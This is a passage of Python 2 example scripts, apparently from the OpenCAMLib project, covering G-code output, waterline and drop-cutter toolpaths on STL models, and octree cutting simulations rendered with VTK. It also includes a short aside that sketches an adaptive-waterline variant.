myscreen.camera.SetFocalPoint(5, 5, 0)
myscreen.render()
print " All done."
myscreen.iren.Start()
```
#### File: scripts/toolpath_examples/ngc_writer.py
```python
clearance_height= 20
feed_height = 10
feed = 200
plunge_feed = 100
metric = True
def line_to(x,y,z):
print "G1 X% 8.6f Y% 8.6f Z% 8.6f F%.0f" % (x, y, z, feed)
def xy_line_to(x,y):
print "G1 X% 8.4f Y% 8.4f " % (x, y)
# (endpoint, radius, center, cw?)
def xy_arc_to( x,y, r, cx,cy, cw ):
if (cw):
print "G2 X% 8.5f Y% 8.5f R% 8.5f" % (x, y, r)
else:
print "G3 X% 8.5f Y% 8.5f R% 8.5f" % (x, y, r)
# FIXME: optional IJK format arcs
def xy_rapid_to(x,y):
print "G0 X% 8.4f Y% 8.4f " % (x, y)
def pen_up():
print "G0Z% 8.4f " % (clearance_height)
"""
def pen_down():
print "G0Z% 8.4f" % (feed_height)
plunge(0)
"""
def pen_down(z=0):
print "G0Z% 8.4f" % (feed_height)
plunge(z)
def plunge(z):
print "G1 Z% 8.4f F% 8.0f" % (z, plunge_feed)
def preamble():
if (metric):
print "G21 F% 8.0f" % (feed) # G20 F6 for inch
else:
print "G20 F% 8.0f" % (feed) # G20 F6 for inch
print "G64 P0.001" # linuxcnc blend mode
pen_up()
print "G0 X0 Y0" # this might not be a good idea!?
def postamble():
pen_up()
print "M2" # end of program
def comment(s=""):
print "( ",s," )"
if __name__ == "__main__":
print "Nothing to see here."
```
#### File: scripts/tsp/tsp_04.py
```python
import ocl
import camvtk
import time
import vtk
import datetime
import math
import gzip
import csv
def readPts():
spamReader = csv.reader(open('tsplib/graph.txt', 'rb'), delimiter=',', quotechar='|')
pts=[]
for row in spamReader:
pts.append( ocl.Point( float(row[0]), float(row[1]) ) )
return pts
def drawTour(myscreen, pts, tour, tourColor = camvtk.red):
for n in range(0,len(tour)-1):
idx0 = n
idx1 = n+1
ip1 = pts[ tour[idx0] ]
ip2 = pts[ tour[idx1] ]
myscreen.addActor( camvtk.Line(p1=(ip1.x,ip1.y,ip1.z),p2=(ip2.x,ip2.y,ip2.z), color=tourColor) )
def drawPoints(myscreen, pts):
c=camvtk.PointCloud( pts )
c.SetPoints()
myscreen.addActor(c )
if __name__ == "__main__":
myscreen = camvtk.VTKScreen()
tsp = ocl.TSPSolver()
pts = readPts()
drawPoints(myscreen, pts)
print "got ",len(pts)," points"
#exit()
for p in pts:
tsp.addPoint( p.x , p.y)
start_time = time.time()
tsp.run()
run_time = time.time() - start_time
l = tsp.getLength()
print "tour length ",l
out = tsp.getOutput()
for o in out:
print o,
drawTour(myscreen, pts, out)
myscreen.camera.SetPosition(0.0, 0.0, 200)
myscreen.camera.SetViewUp(0.0, 0.0, 0)
myscreen.camera.SetFocalPoint(50, 50, 0)
myscreen.render()
myscreen.iren.Start()
```
#### File: scripts/waterline/waterline_6_weave2.py
```python
import ocl
import camvtk
import time
import vtk
import datetime
import math
def waterline_time(zheights, diam, length,s,sampling):
t_total = time.time()
for zh in zheights:
cutter = ocl.BallCutter( diam , length )
wl = ocl.Waterline()
wl.setSTL(s)
wl.setCutter(cutter)
wl.setZ(zh)
wl.setSampling(sampling)
wl.setThreads(1)
wl.run()
cutter_loops = wl.getLoops()
for l in cutter_loops:
loops.append(l)
timeTotal = time.time()-t_total
print " ALL Waterlines done in ", timeTotal ," s"
return timeTotal
if __name__ == "__main__":
print ocl.version()
a = ocl.Point(0,1,0.3)
b = ocl.Point(1,0.5,0.3)
c = ocl.Point(0,0,0)
t = ocl.Triangle(b,c,a)
s = ocl.STLSurf()
s.addTriangle(t) # a one-triangle STLSurf
# alternatively, run on the tux model
stl = camvtk.STLSurf("../../stl/gnu_tux_mod.stl")
#myscreen.addActor(stl)
#stl.SetWireframe() # render tux as wireframe
#stl.SetSurface() # render tux as surface
#stl.SetColor(camvtk.cyan)
polydata = stl.src.GetOutput()
s = ocl.STLSurf()
camvtk.vtkPolyData2OCLSTL(polydata, s)
zheights=[-0.3, -0.2, -0.1, -0.05, 0.0, 0.05, 0.1, 0.15, 0.2, 0.25, 0.26, 0.27, 0.28, 0.29 ] # the z-coordinates for the waterlines
zheights=[-0.8, -0.7, -0.6, -0.5, -0.4, -0.3, -0.2, -0.1, -0.05, 0.0, 0.05, 0.1, 0.15, 0.2, 0.28 ]
zheights=[ -0.05, 0.0, 0.05, 0.1, 0.15, 0.2, 0.28]
zheights=[ 1.75145 ]
diam = 0.6 # run the thing for all these cutter diameters
length = 5
loops = []
cutter = ocl.CylCutter( 1 , 1 )
sampling=0.005
waterline_time(zheights, diam, length,s,sampling)
```
#### File: scripts/waterline/waterline_8_tux_adaptive.py
```python
import ocl
import camvtk
import time
import vtk
import datetime
import math
def drawLoops(myscreen,loops,loopColor):
# draw the loops
nloop = 0
for lop in loops:
n = 0
N = len(lop)
first_point=ocl.Point(-1,-1,5)
previous=ocl.Point(-1,-1,5)
for p in lop:
if n==0: # don't draw anything on the first iteration
previous=p
first_point = p
elif n== (N-1): # the last point
myscreen.addActor( camvtk.Line(p1=(previous.x,previous.y,previous.z),p2=(p.x,p.y,p.z),color=loopColor) ) # the normal line
# and a line from p to the first point
myscreen.addActor( camvtk.Line(p1=(p.x,p.y,p.z),p2=(first_point.x,first_point.y,first_point.z),color=loopColor) )
else:
myscreen.addActor( camvtk.Line(p1=(previous.x,previous.y,previous.z),p2=(p.x,p.y,p.z),color=loopColor) )
previous=p
n=n+1
print "rendered loop ",nloop, " with ", len(lop), " points"
nloop = nloop+1
def getLoops(wl,zh,diam):
t_before = time.time()
wl.reset()
wl.setZ(zh)
wl.run()
t_after = time.time()
calctime = t_after-t_before
print " Waterline done in ", calctime," s"
return wl.getLoops()
if __name__ == "__main__":
print ocl.version()
myscreen = camvtk.VTKScreen()
#stl = camvtk.STLSurf("../../stl/demo.stl")
stl = camvtk.STLSurf("../../stl/gnu_tux_mod.stl")
myscreen.addActor(stl)
#stl.SetWireframe() # render tux as wireframe
stl.SetSurface() # render tux as surface
stl.SetColor(camvtk.cyan)
polydata = stl.src.GetOutput()
s = ocl.STLSurf()
camvtk.vtkPolyData2OCLSTL(polydata, s)
print "STL surface read,", s.size(), "triangles"
#zh = 1.0
t_before = time.time()
diam = 0.5
zheights=[0.2, 0.4, 0.6, 0.8, 1.0, 1.2, 1.4, 1.6, 1.8, 2.0, 2.2, 2.4, 2.6]
zheights=[float(1.0)]
wl = ocl.Waterline()
#wl = ocl.AdaptiveWaterline()
wl.setSTL(s)
length= 10
cutter = ocl.BallCutter( diam , length )
wl.setCutter(cutter)
wl.setSampling(0.0314)
for zh in zheights:
print "calculating Waterline at z= ", zh
cutter_loops = getLoops(wl,zh,diam)
drawLoops(myscreen,cutter_loops,camvtk.red)
t_after = time.time()
calctime = t_after-t_before
print " TOTAL Waterline time is: ", calctime," s"
print "done."
myscreen.camera.SetPosition(15, 13, 7)
myscreen.camera.SetFocalPoint(5, 5, 0)
camvtk.drawArrows(myscreen,center=(-0.5,-0.5,-0.5))
camvtk.drawOCLtext(myscreen)
myscreen.render()
myscreen.iren.Start()
#raw_input("Press Enter to terminate")
```
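Despite its filename, the script above constructs a plain `ocl.Waterline()` and leaves `ocl.AdaptiveWaterline()` commented out. The sketch below shows the swap; it is an assumption that AdaptiveWaterline exposes the same setSTL/setCutter/setSampling/setZ/run/getLoops interface used in these scripts, so verify against the OpenCAMLib build in use.
```python
# Sketch only: adaptive counterpart of getLoops() above; interface assumed
# identical to ocl.Waterline(), which may not hold for every OpenCAMLib version.
import ocl

def adaptive_loops(surface, diam, length, zh, sampling):
    cutter = ocl.BallCutter(diam, length)
    awl = ocl.AdaptiveWaterline()   # instead of ocl.Waterline()
    awl.setSTL(surface)
    awl.setCutter(cutter)
    awl.setSampling(sampling)
    awl.setZ(zh)
    awl.run()
    return awl.getLoops()
```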
#### File: attic/cutsim/cutsim_07_circle.py
```python
import ocl
import pyocl
import camvtk
import time
import datetime
import vtk
import math
def main():
print ocl.revision()
myscreen = camvtk.VTKScreen()
myscreen.camera.SetPosition(-15, -8, 15)
myscreen.camera.SetFocalPoint(0,0, 0)
# axis arrows
#camvtk.drawArrows(myscreen,center=(0,0,0))
s = ocl.SphereOCTVolume()
s.center = ocl.Point(-2.50,-0.6,0)
s.radius = 1.1345
# screenshot writer
w2if = vtk.vtkWindowToImageFilter()
w2if.SetInput(myscreen.renWin)
lwr = vtk.vtkPNGWriter()
lwr.SetInput( w2if.GetOutput() )
cp= ocl.Point(0,0,-16)
#depths = [3, 4, 5, 6, 7, 8]
max_depth = 8
root_scale = 16
t = ocl.Octree(root_scale, max_depth, cp)
t.init(4)
n = 0 # the frame number
nmax=80
theta=0
dtheta=0.06
thetalift=-0.01
s.center = ocl.Point( 1.3*math.cos(theta),1.3*math.sin(theta),thetalift*theta)
mc = ocl.MarchingCubes()
while (n<=nmax):
print "diff...",
t_before = time.time()
t.diff_negative(s)
t_after = time.time()
build_time = t_after-t_before
print "done in ", build_time," s"
if n==nmax:
t_before = time.time()
print "mc()...",
tris = mc.mc_tree(t) #.mc_triangles()
t_after = time.time()
mc_time = t_after-t_before
print "done in ", mc_time," s"
print " mc() got ", len(tris), " triangles"
mc_surf = camvtk.STLSurf( triangleList=tris, color=camvtk.red )
#mc_surf.SetWireframe()
mc_surf.SetColor(camvtk.cyan)
print " STLSurf()...",
myscreen.addActor( mc_surf )
print "done."
nodes = t.get_leaf_nodes()
allpoints=[]
#for no in nodes:
# verts = no.vertices()
# for v in verts:
# allpoints.append(v)
#oct_points = camvtk.PointCloud( allpoints )
print " PointCloud()...",
#myscreen.addActor( oct_points )
print "done."
print " render()...",
myscreen.render()
print "done."
#lwr.SetFileName("frames/mc8_frame"+ ('%06d' % n)+".png")
#myscreen.camera.Azimuth( 2 )
#myscreen.render()
#w2if.Modified()
#lwr.Write()
#mc_surf.SetWireframe()
#print "sleep...",
#time.sleep(1.02)
#print "done."
if n != nmax:
myscreen.removeActor( mc_surf )
#myscreen.removeActor( oct_points )
# move forward
theta = n*dtheta
sp1 = ocl.Point(s.center)
s.center = ocl.Point( 1.3*math.cos(theta),1.3*math.sin(theta),thetalift*theta)
sp2 = ocl.Point(s.center)
print "line from ",sp1," to ",sp2
if n != nmax:
myscreen.addActor( camvtk.Line( p1=(sp1.x,sp1.y,sp1.z),p2=(sp2.x,sp2.y,sp2.z), color=camvtk.red ) )
print "center moved to", s.center
n=n+1
print "All done."
myscreen.iren.Start()
if __name__ == "__main__":
main()
```
#### File: attic/cutsim/cutsim_09_tux_video.py
```python
import ocl
import pyocl
import camvtk
import time
import datetime
import vtk
import math
def main():
print ocl.revision()
myscreen = camvtk.VTKScreen()
myscreen.camera.SetPosition(-8, -4, 25)
myscreen.camera.SetFocalPoint(4.5,6, 0)
# axis arrows
camvtk.drawArrows(myscreen,center=(-1,-1,0))
camvtk.drawOCLtext(myscreen)
octtext = camvtk.Text()
octtext.SetPos( (70, myscreen.height-600) )
myscreen.addActor( octtext)
cltext = camvtk.Text()
cltext.SetPos( (70, myscreen.height-100) )
myscreen.addActor( cltext)
stl = camvtk.STLSurf("../../stl/gnu_tux_mod.stl")
#myscreen.addActor(stl)
#stl.SetWireframe()
stl.SetColor((0.5,0.5,0.5))
polydata = stl.src.GetOutput()
s = ocl.STLSurf()
camvtk.vtkPolyData2OCLSTL(polydata, s)
print "STL surface read,", s.size(), "triangles"
#angle = math.pi/4
radius = 0.4
length=5
cutter = ocl.BallCutter(2*radius, length)
#cutter = ocl.CylCutter(2*radius, length)
# generate CL-points
minx=0
dx=0.1/0.4
maxx=9
miny=0
dy=cutter.getRadius()/1.5
maxy=12
z=-1
# this generates a list of CL-points in a grid
clpoints = pyocl.CLPointGrid(minx,dx,maxx,miny,dy,maxy,z)
# batchdropcutter
bdc = ocl.BatchDropCutter()
bdc.bucketSize = 7
bdc.setSTL(s)
bdc.setCutter(cutter)
#bdc.setThreads(1) # explicitly setting one thread is better for debugging
for p in clpoints:
bdc.appendPoint(p)
t_before = time.time()
bdc.run()
t_after = time.time()
calctime = t_after-t_before
print " BDC4 done in ", calctime," s"
dropcutter_time = calctime
clpoints = bdc.getCLPoints()
#camvtk.drawCLPointCloud(myscreen, clpoints)
print " clpts= ", len(clpoints)
myscreen.render()
#myscreen.iren.Start()
#exit()
s = ocl.BallCutterVolume()
#s = ocl.CylCutterVolume()
#s.center = ocl.Point(-2.50,-0.6,0)
s.radius = cutter.getRadius()
s.length = cutter.getLength()
# screenshot writer
w2if = vtk.vtkWindowToImageFilter()
w2if.SetInput(myscreen.renWin)
lwr = vtk.vtkPNGWriter()
lwr.SetInput( w2if.GetOutput() )
cp= ocl.Point(5,5,-3) # center of octree
#depths = [3, 4, 5, 6, 7, 8]
max_depth = 7
root_scale = 7
t = ocl.Octree(root_scale, max_depth, cp)
t.init(5)
n = 0 # the frame number
stockbox = ocl.PlaneVolume( 1, 0, 0.1)
t.diff_negative(stockbox)
stockbox = ocl.PlaneVolume( 0, 0, 8.9 )
t.diff_negative(stockbox)
stockbox = ocl.PlaneVolume( 1, 1, 0.1)
t.diff_negative(stockbox)
stockbox = ocl.PlaneVolume( 0, 1, 11.9 )
t.diff_negative(stockbox)
stockbox = ocl.PlaneVolume( 1, 2, -0.5 )
t.diff_negative(stockbox)
stockbox = ocl.PlaneVolume( 0, 2, 3)
t.diff_negative(stockbox)
mc = ocl.MarchingCubes()
print "mc()...",
tris = mc.mc_tree(t) #.mc_triangles()
print " mc() got ", len(tris), " triangles"
mc_surf = camvtk.STLSurf( triangleList=tris, color=camvtk.red )
mc_surf.SetColor(camvtk.cyan)
print " STLSurf()...",
myscreen.addActor( mc_surf )
print "done."
cl = ocl.Point(0,0,5)
cactors = camvtk.drawBallCutter(myscreen, cutter, cl)
myscreen.render()
#myscreen.iren.Start()
#exit()
myscreen.removeActor( mc_surf )
renderinterleave=len(clpoints)/100
step_time = 0
#render_time = 0
while (n<len(clpoints)):
cl = ocl.Point( clpoints[n].x, clpoints[n].y, clpoints[n].z )
s.setPos( cl ) # move the cutter
t_before = time.time()
t.diff_negative(s) # subtract cutter from stock
t_after = time.time()
build_time = t_after-t_before
step_time=step_time+build_time
n=n+1
if n<(len(clpoints)-renderinterleave):
myscreen.removeActor( mc_surf )
for c in cactors:
myscreen.removeActor( c )
if ( (n%renderinterleave)==0):
cactors = camvtk.drawBallCutter(myscreen, cutter, cl)
t_before = time.time()
print "mc()...",
tris = mc.mc_tree(t) #.mc_triangles()
mc_time = time.time()-t_before
print "done in ", mc_time," s"
print " mc() got ", len(tris), " triangles"
print " STLSurf()...",
t_before = time.time()
mc_surf = camvtk.STLSurf( triangleList=tris, color=camvtk.red )
#mc_surf.SetWireframe()
mc_surf.SetColor(camvtk.cyan)
myscreen.addActor( mc_surf )
print "done."
print " render()...",
myscreen.render()
render_time = time.time()-t_before
myscreen.camera.Azimuth( 0.1 )
lwr.SetFileName("frames/cutsim_d10_frame"+ ('%06d' % n)+".png")
w2if.Modified()
call_ms = step_time/renderinterleave
print renderinterleave," diff() calls in", step_time, " = ", call_ms," ms/call"
infotext= "Octree max_depth=%i \nCL-point %i of %i \n%i CL-pts/frame\ndiff()-time: %1.3f s/CL-point\nmc()-time: %1.3f s/frame\nrender()-time: %1.3f s/frame\n%i Triangles" % (max_depth,n,
len(clpoints), renderinterleave, call_ms, mc_time, render_time, len(tris))
octtext.SetText(infotext)
postext= "X: %f\nY: %f\nZ: %f" % (cl.x,cl.y,cl.z )
cltext.SetText(postext)
#lwr.Write() # uncomment to actually write files to disk
print "done."
step_time = 0
#lwr.SetFileName("frames/mc8_frame"+ ('%06d' % n)+".png")
#myscreen.camera.Azimuth( 2 )
#myscreen.render()
#w2if.Modified()
#lwr.Write()
#mc_surf.SetWireframe()
#print "sleep...",
#time.sleep(1.02)
#print "done."
print " clpts= ", len(clpoints)
print "All done."
myscreen.iren.Start()
if __name__ == "__main__":
main()
```
#### File: attic/ocode/cutsim_test_2.py
```python
import ocl
import pyocl
import camvtk
import time
import datetime
import vtk
def main(filename="frame/f.png"):
print ocl.revision()
myscreen = camvtk.VTKScreen()
myscreen.camera.SetPosition(-15, -8, 15)
myscreen.camera.SetFocalPoint(5,5, 0)
# axis arrows
camvtk.drawArrows(myscreen,center=(-1,-1,0))
# screenshot writer
w2if = vtk.vtkWindowToImageFilter()
w2if.SetInput(myscreen.renWin)
lwr = vtk.vtkPNGWriter()
lwr.SetInput( w2if.GetOutput() )
c = ocl.CylCutter(2) # cutter
c.length = 3
print "cutter length=", c.length
# generate CL-points
stl = camvtk.STLSurf("../stl/demo.stl")
polydata = stl.src.GetOutput()
s = ocl.STLSurf()
camvtk.vtkPolyData2OCLSTL(polydata, s)
print "STL surface read,", s.size(), "triangles"
print s.getBounds()
#exit()
minx=0
dx=0.1/6
maxx=10
miny=0
dy=1
maxy=10
z=-17
# this generates a list of CL-points in a grid
clpoints = pyocl.CLPointGridZigZag(minx,dx,maxx,miny,dy,maxy,z)
print "generated grid with", len(clpoints)," CL-points"
# batchdropcutter
bdc = ocl.BatchDropCutter()
bdc.setSTL(s,1)
bdc.setCutter(c)
for p in clpoints:
bdc.appendPoint(p)
t_before = time.time()
print "threads=",bdc.nthreads
bdc.dropCutter4()
t_after = time.time()
calctime = t_after-t_before
print " done in ", calctime," s"
clpoints = bdc.getCLPoints()
# filter
print "filtering. before filter we have", len(clpoints),"cl-points"
f = ocl.LineCLFilter()
f.setTolerance(0.001)
for p in clpoints:
f.addCLPoint(p)
f.run()
clpts = f.getCLPoints()
print "after filtering we have", len(clpts),"cl-points"
#exit()
# stupid init code
f=ocl.Ocode()
tree_maxdepth=8
f.set_depth(tree_maxdepth) # depth and scale set here.
f.set_scale(10)
# cube
stockvol = ocl.BoxOCTVolume()
stockvol.corner = ocl.Point(0,0,-0.5)
stockvol.v1 = ocl.Point(10,0,0)
stockvol.v2 = ocl.Point(0,10,0)
stockvol.v3 = ocl.Point(0,0,3)
stockvol.calcBB()
#cube1.side=10.0
#cube1.center = ocl.Point(0,0,0)
#cube1.calcBB()
t_before = time.time()
stock = ocl.LinOCT()
stock.init(3)
stock.build( stockvol )
calctime = time.time()-t_before
print " stock built in ", calctime," s, stock.size()=",stock.size()
# draw initial octree
#tlist = pyocl.octree2trilist(stock)
#surf = camvtk.STLSurf(triangleList=tlist)
#myscreen.addActor(surf)
# draw initial cutter
#startp = ocl.Point(0,0,0)
#cyl = camvtk.Cylinder(center=(startp.x,startp.y,startp.z), radius=c.radius,
# height=c.length,
# rotXYZ=(90,0,0), color=camvtk.grey)
#cyl.SetWireframe()
#myscreen.addActor(cyl)
timetext = camvtk.Text()
timetext.SetPos( (myscreen.width-300, myscreen.height-30) )
myscreen.addActor( timetext)
ocltext = camvtk.Text()
ocltext.SetPos( (myscreen.width-300, myscreen.height-60) )
myscreen.addActor( ocltext)
ocltext.SetText("OpenCAMLib")
octtext = camvtk.Text()
octtext.SetPos( (myscreen.width-300, myscreen.height-90) )
myscreen.addActor( octtext)
octtext.SetText("Octree cutting-simulation")
infotext = camvtk.Text()
infotext.SetPos( (myscreen.width-300, myscreen.height-180) )
myscreen.addActor( infotext)
Nmoves = len(clpts)
print Nmoves,"CL-points to process"
for n in xrange(0,Nmoves-1):
timetext.SetText(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
#if n<Nmoves-1:
print n," to ",n+1
startp = clpts[n] # start of move
endp = clpts[n+1] # end of move
t_before = time.time()
sweep = ocl.LinOCT()
sweep.init(0)
calctime = time.time()-t_before
print " sweep-init done in ", calctime," s, sweep.size()=",sweep.size()
g1vol = ocl.CylMoveOCTVolume(c, ocl.Point(startp.x,startp.y,startp.z), ocl.Point(endp.x,endp.y,endp.z))
t_before = time.time()
sweep.build( g1vol )
calctime = time.time()-t_before
print " sweep-build done in ", calctime," s, sweep.size()=",sweep.size()
# draw cutter
cyl1 = camvtk.Cylinder(center=(startp.x,startp.y,startp.z), radius=c.radius,
height=c.length,
rotXYZ=(90,0,0), color=camvtk.lgreen)
cyl1.SetWireframe()
#myscreen.addActor(cyl1)
cyl2 = camvtk.Cylinder(center=(endp.x,endp.y,endp.z), radius=c.radius,
height=c.length,
rotXYZ=(90,0,0), color=camvtk.pink)
cyl2.SetWireframe()
#myscreen.addActor(cyl2)
#camvtk.drawCylCutter(myscreen, c, startp)
#camvtk.drawCylCutter(myscreen, c, endp)
myscreen.addActor( camvtk.Line( p1=(startp.x,startp.y,startp.z), p2=(endp.x,endp.y,endp.z), color=camvtk.red))
#camvtk.drawTree2(myscreen,sweep,color=camvtk.red,opacity=0.5)
t_before = time.time()
stock.diff(sweep)
calctime = time.time()-t_before
print " diff done in ", calctime," s, stock.size()", stock.size()
info = "tree-depth:%i \nmove: %i \nstock-nodes: %i \nsweep-nodes: %i" % (tree_maxdepth, n, stock.size(), sweep.size() )
infotext.SetText(info)
if (n%1==0 or n==Nmoves-2): # draw only every m:th frame
# sweep surface
t_before = time.time()
#sweep_tlist = pyocl.octree2trilist(sweep)
sweep_tlist = sweep.get_triangles()
sweepsurf = camvtk.STLSurf(triangleList=sweep_tlist)
sweepsurf.SetColor(camvtk.red)
sweepsurf.SetOpacity(0.1)
myscreen.addActor(sweepsurf)
calctime = time.time()-t_before
print " sweepsurf-render ", calctime," s"
# stock surface
t_before = time.time()
#tlist = pyocl.octree2trilist(stock)
tlist = stock.get_triangles()
stocksurf = camvtk.STLSurf(triangleList=tlist)
stocksurf.SetColor(camvtk.cyan)
stocksurf.SetOpacity(1.0)
myscreen.addActor(stocksurf)
calctime = time.time()-t_before
print " stocksurf-render ", calctime," s"
#time.sleep(1.1)
# write screenshot to disk
lwr.SetFileName("frames/cutsim_frame"+ ('%03d' % n)+".png")
#lwr.SetFileName(filename)
t_before = time.time() # time the render process
myscreen.render()
w2if.Modified()
lwr.Write()
calctime = time.time()-t_before
print " render ", calctime," s"
#myscreen.render()
#time.sleep(0.1)
myscreen.removeActor(sweepsurf)
if n != (Nmoves-2):
myscreen.removeActor(stocksurf)
#myscreen.removeActor(cyl1)
#myscreen.removeActor(cyl2)
#myscreen.render()
#time.sleep(0.1)
print " render()...",
myscreen.render()
print "done."
#time.sleep(0.2)
myscreen.iren.Start()
if __name__ == "__main__":
main()
```
#### File: attic/ocode/ocode_cylcutter_volume_2.py
```python
import ocl
import camvtk
import time
import datetime
import vtk
def drawTree(myscreen,t,color=camvtk.red,opacity=0.2, offset=(0,0,0)):
nodes = t.get_nodes()
black=0
nmax=len(nodes)
i=0
for n in nodes:
cen = n.point()
#print "cen=",cen.str()
scale = n.get_scale()
#print "col=", n.color
if n.color == 0:
#print "found white node!"
#color = camvtk.red
cube = camvtk.Cube(center=(cen.x+offset[0], cen.y+offset[1], cen.z+offset[2]), length= scale, color=color)
cube.SetOpacity(opacity)
#cube.SetPhong()
cube.SetGouraud()
#cube.SetWireframe()
myscreen.addActor( cube )
black = black+1
if n.color == 1:
#print "found white node!"6
color = camvtk.blue
cube = camvtk.Cube(center=(cen.x, cen.y, cen.z), length= scale, color=color)
cube.SetOpacity(opacity)
myscreen.addActor( cube )
#black = black+1
if ( (i % (nmax/10))==0):
print ".",
i=i+1
print "done."
#print black," black nodes"
"""
for m in xrange(0,9):
cen = n.corner(m)
sph = camvtk.Sphere( center=(cen.x, cen.y, cen.z), radius=0.5, color=camvtk.green)
myscreen.addActor(sph)
"""
#myscreen.render()
#raw_input("Press Enter to terminate")
def main(filename="frame/f.png",yc=6, n=0):
f=ocl.Ocode()
f.set_depth(10)
myscreen = camvtk.VTKScreen()
myscreen.camera.SetPosition(50, 22, 40)
myscreen.camera.SetFocalPoint(0,0, 0)
myscreen.camera.Azimuth( n*0.5 )
# box around octree
oct_cube = camvtk.Cube(center=(0,0,0), length=40, color=camvtk.white)
oct_cube.SetWireframe()
myscreen.addActor(oct_cube)
# screenshot writer
w2if = vtk.vtkWindowToImageFilter()
w2if.SetInput(myscreen.renWin)
lwr = vtk.vtkPNGWriter()
lwr.SetInput( w2if.GetOutput() )
arrowcenter=(1,2,0)
xar = camvtk.Arrow(color=camvtk.red, center=arrowcenter, rotXYZ=(0,0,0))
myscreen.addActor(xar)
yar = camvtk.Arrow(color=camvtk.green, center=arrowcenter, rotXYZ=(0,0,90))
myscreen.addActor(yar)
zar = camvtk.Arrow(color=camvtk.blue, center=arrowcenter, rotXYZ=(0,-90,0))
myscreen.addActor(zar)
t = ocl.LinOCT()
#t2 = ocl.LinOCT()
t.init(3)
#t2.init(3)
print " after init() t :", t.str()
#print " after init() t2 :", t2.str()
# sphere
svol = ocl.SphereOCTVolume()
svol.radius=3.2
svol.center = ocl.Point(1,0,3)
# cube
cube1 = ocl.CubeOCTVolume()
cube1.side=69
cube1.center = ocl.Point(0,0,0)
#cylinder
cylvol = ocl.CylinderOCTVolume()
cylvol.p2 = ocl.Point(0,0,4)
cylvol.radius= 4
c = ocl.CylCutter(1)
c.length = 3
print "cutter length=", c.length
p1 = ocl.Point(0,0,0)
p2 = ocl.Point(1,1.4,0)
g1vol = ocl.CylMoveOCTVolume(c, p1, p2)
cyl1 = camvtk.Cylinder(center=(p1.x,p1.y,p1.z), radius=c.radius,
height=c.length,
rotXYZ=(90,0,0), color=camvtk.grey)
cyl1.SetWireframe()
myscreen.addActor(cyl1)
cyl2 = camvtk.Cylinder(center=(p2.x,p2.y,p2.z), radius=c.radius,
height=c.length,
rotXYZ=(90,0,0), color=camvtk.grey)
cyl2.SetWireframe()
myscreen.addActor(cyl2)
startp = camvtk.Sphere(center=(p1.x,p1.y,p1.z), radius=0.1, color=camvtk.green)
myscreen.addActor(startp)
endp = camvtk.Sphere(center=(p2.x,p2.y,p2.z), radius=0.1, color=camvtk.red)
myscreen.addActor(endp)
t.build(g1vol )
#print "t2 build()"
#t2.build(cube1)
#print " t2 after build() ", t2.size()
#t2.condense()
#print " t2 after condense() ", t2.size()
# original trees
drawTree(myscreen,t,opacity=1, color=camvtk.green)
#drawTree(myscreen,t2,opacity=1, color=camvtk.red)
#print " diff12()...",
#t3 = t2.operation(1,t)
#print "done."
#print " diff21()...",
#t4 = t2.operation(2,t)
#print "done."
#print " intersection()...",
#t5 = t2.operation(3,t)
#print "done."
#print " sum()...",
#t6 = t2.operation(4,t)
#print "done."
#print " difference 1-2 t3 (blue) =", t3.size()
#print " difference 2-1 t4 (yellow)=", t4.size()
#print " intersection t5 (pink) =", t5.size()
#print " union t6 (grey) =", t6.size()
#drawTree(myscreen,t3,opacity=1, color=camvtk.blue, offset=(0,15,0))
#drawTree(myscreen,t4,opacity=1, color=camvtk.yellow,offset=(0,-15,0))
#drawTree(myscreen,t5,opacity=1, color=camvtk.pink,offset=(-15,0,0))
#drawTree(myscreen,t6,opacity=1, color=camvtk.grey,offset=(-15,-15,0))
title = camvtk.Text()
title.SetPos( (myscreen.width-350, myscreen.height-30) )
title.SetText("OpenCAMLib " + datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
myscreen.addActor(title)
#st2 = camvtk.Text()
#ytext = "Linear OCTree set operations: difference, intersection, union"
#st2.SetText(ytext)
#st2.SetPos( (50, myscreen.height-30) )
#myscreen.addActor( st2)
#st3 = camvtk.Text()
#text = "Original OCTrees\n Ball:%d nodes\n Cube: %d nodes" % ( t.size(), t2.size() )
#st3.SetText(text)
#st3.SetPos( (50, 200) )
#myscreen.addActor( st3)
#st4 = camvtk.Text()
#un = " Union (grey): %d nodes\n" % (t6.size())
#int = " Intersection (pink): %d nodes\n" % (t5.size())
#diff1 = " difference Cube-Ball (blue): %d nodes\n" % (t3.size())
#diff2 = " difference Ball-Cube (yellow): %d nodes\n" % (t4.size())
#text= un+int+diff1+diff2
#st4.SetText(text)
#st4.SetPos( (50, 100) )
#myscreen.addActor( st4)
myscreen.render()
lwr.SetFileName(filename)
time.sleep(0.2)
#lwr.Write()
myscreen.iren.Start()
if __name__ == "__main__":
#Nsteps = 720
#ystart = 6
#ystop = -6
#ystep = float(ystop-ystart)/(Nsteps-1)
main()
#fiangle = fiangle + 2
```
#### File: attic/ocode/ocode_cylcutter_volume.py
```python
import ocl
import camvtk
import time
import datetime
import vtk
def drawTree(myscreen,t,color=camvtk.red,opacity=0.2, offset=(0,0,0)):
nodes = t.get_nodes()
nmax=len(nodes)
i=0
for n in nodes:
cen = n.point()
#print "cen=",cen.str()
scale = n.get_scale()
#print "col=", n.color
cube = camvtk.Cube(center=(cen.x+offset[0], cen.y+offset[1], cen.z+offset[2]), length= scale, color=color)
cube.SetOpacity(opacity)
#cube.SetPhong()
cube.SetGouraud()
#cube.SetWireframe()
myscreen.addActor( cube )
if ( (i % (nmax/10))==0):
print ".",
i=i+1
print "done."
def drawTree2(myscreen,t,color=camvtk.red,opacity=0.2, offset=(0,0,0)):
nodes = t.get_nodes()
nmax=len(nodes)
print "drawTree2: ", nmax," nodes",
# make a list of triangles
tlist = []
i=0
for n in nodes:
p1 = n.corner(0) # + + +
p2 = n.corner(1) # - + +
p3 = n.corner(2) # + - +
p4 = n.corner(3) # + + -
p5 = n.corner(4) # + - -
p6 = n.corner(5) # - + -
p7 = n.corner(6) # - - +
p8 = n.corner(7) # - - -
tlist.append(ocl.Triangle(p1,p2,p3)) #top
tlist.append(ocl.Triangle(p2,p3,p7)) #top
tlist.append(ocl.Triangle(p4,p5,p6)) # bot
tlist.append(ocl.Triangle(p5,p6,p8)) # bot
tlist.append(ocl.Triangle(p1,p3,p4)) # 1,3,4,5
tlist.append(ocl.Triangle(p4,p5,p3))
tlist.append(ocl.Triangle(p2,p6,p7)) # 2,6,7,8
tlist.append(ocl.Triangle(p7,p8,p6))
tlist.append(ocl.Triangle(p3,p5,p7)) # 3,5,7,8
tlist.append(ocl.Triangle(p7,p8,p5))
